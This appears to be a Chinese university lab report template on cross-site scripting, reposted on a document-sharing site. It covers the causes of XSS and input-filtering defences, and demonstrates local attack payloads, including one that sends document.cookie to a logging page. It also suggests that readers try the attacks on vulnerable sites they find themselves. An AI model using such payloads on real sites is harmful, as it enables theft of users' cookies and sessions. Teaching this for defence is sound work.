实验44的实验报告_实验44的实验报告
实验44的实验报告由刀豆文库小编整理,希望给你工作、学习、生活带来方便,猜你可能喜欢“实验44的实验报告”。
电 子 科 技 大 学
实
验
报
告
学生姓名:
学 号:
指导教师:实验地点:主楼A2-413-1
实验时间:
一、实验室名称:主楼A2-413-1
二、实验项目名称:跨站攻击实验
三、实验学时: 1 学时
四、实验原理:
1.什么是跨站攻击?
定义一:即Cro Site Script Execution(通常简写为XSS)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用 户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
定义二:指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。
由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息(Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Javascript脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。2.跨站漏洞成因 成因很简单,就是因为程序没有对用户提交的变量中的HTML代码进行过滤或转换。3.防范跨站攻击
对于普通用户而言:
在你的WEB浏览器上禁用java脚本,具体方法,先打开你的IE的Internet选项,切换到“安全”页,有个“自定义”级别,点击出现如图8-1所示窗口,禁用就可以了。
图8-1
但是好象不太可能,因为一旦禁用,很多功能就丧失了,这个方法是下策。
还有不要访问包含〈〉字符的连接,当然一些官方的URL不会包括任何脚本元素。
对于开发人员而言:
如果你的站点程序含论坛,留言板,以及其他程序中含提交数据格式的。需要对提交数据进行过滤,如:转换掉“”,使用户不能构造Html标记;过滤掉 “:”和“&”,使用户不能将标记的属性设为Script;过滤掉空格,使用户不能引发事件机制等。
五、实验目的: 1.了解跨站攻击产生原因 2.了解跨站攻击所能产生的效果 3.了解防范跨站攻击的方法
六、实验内容:
1.编写简单的跨站攻击程序。2.编写程序实现盗取用户cookie。
七、实验器材(设备、元器件):
PC微机一台、SimpleNAD网络实验教学系统
八、实验步骤:
本实验在windowsXP下使用自行编写的例子完成,例子本身比较简单,仅供原理说明及效果演示。读者如有兴趣,可以自行寻找具有x漏洞的网站进行相应实验。
1.跨站攻击原理及效果展示
下面将通过一个简单例子来说明跨站攻击的原理及效果
首先打开浏览器,在地址栏中输入“http://127.0.0.1:8080/x1/input.htm”在打开的页面中的文本框中输入任意字符串,比如:“hello world!”,如图8-2:
图8-2
点击“提交”按钮后,打开的新页面将刚才输入的内容显示了出来。如图8-3:
图8-3
可见本页面的功能是将用户填写的内容原封不动显示出来。
在浏览器中重新打开“http://127.0.0.1:8080/x1/input.htm”,在文本框中输入如下内容:“alert(“test for XSS”)”,并点击输入。如图8-4:
图8-4
这时,可以发现并没有按照预想结果,将刚才输入的字符串如实显示出来,而是把其当一段脚本加以执行,弹出了一个弹出框,如图8-5:
图8-5
如果我们将输入的内容改为:“window.open(“http://www.daodoc.com”)”,点击“提交”按钮后,将会跳转到百度的首页,如果我们将链接地址改为预先构造好的恶意页面将会对查看该页面内容的用户造成很大的威胁。2.跨站盗取用户cookie 下面同样通过一个简单例子对利用跨站漏洞进行cookie内容的盗取。首先,打开浏览器在地址栏中输入:“http://127.0.0.1:8080/x2/logtc.asp”;在打开的页面中,“用户名”和“留言”栏分别输入任意的字符串,比如:“匿名”和“你好”,如图8-6:
图8-6 点击“提交”按钮后,刚才所输入的内容将被显示出来。如图8-7:
图8-7
可见用户填写的内容在提交后,将在同一页面显示出来。
在浏览器中重新打开“http://127.0.0.1:8080/x2/logtc.asp”,在文本框中输入如下内容:“alert(document.cookie)”,并点击输入。如图8-8:
图8-8
随后,可以发现用户cookie的内容在弹出框中被显示出来了,如图8-9
图8-9
对留言栏输入的内容稍加修改,就可以将用户cookie的内容记录下来,比如在留言栏中输入“http://localhost/x2/tc.asp? msg=’ + document.cookie)”(其中tc.asp实现了cookie文件的写入,在实践中也可以自行编写相应代码),就可以将相应内容记录到文件中,如图8-10:
图8-10
九、实验数据及结果分析:
十、实验结论:
如果对用户输入内容未加过滤,然后又将其原封不动在某个某个页面显示出来,就会产生夸张漏洞。利用跨站漏洞攻击者可以实现盗取用户信息,将用户引导有恶意代码的页面等攻击。
十一、总结及心得体会:
通过本次实验,基本了解跨站攻击产生原理,也经过具体的实验操作,看到了跨站攻击所能产生的效果,同时也了解了防范跨站攻击的方法。
十二、对本实验过程及方法、手段的改进建议:无
报告评分:
指导教师签字: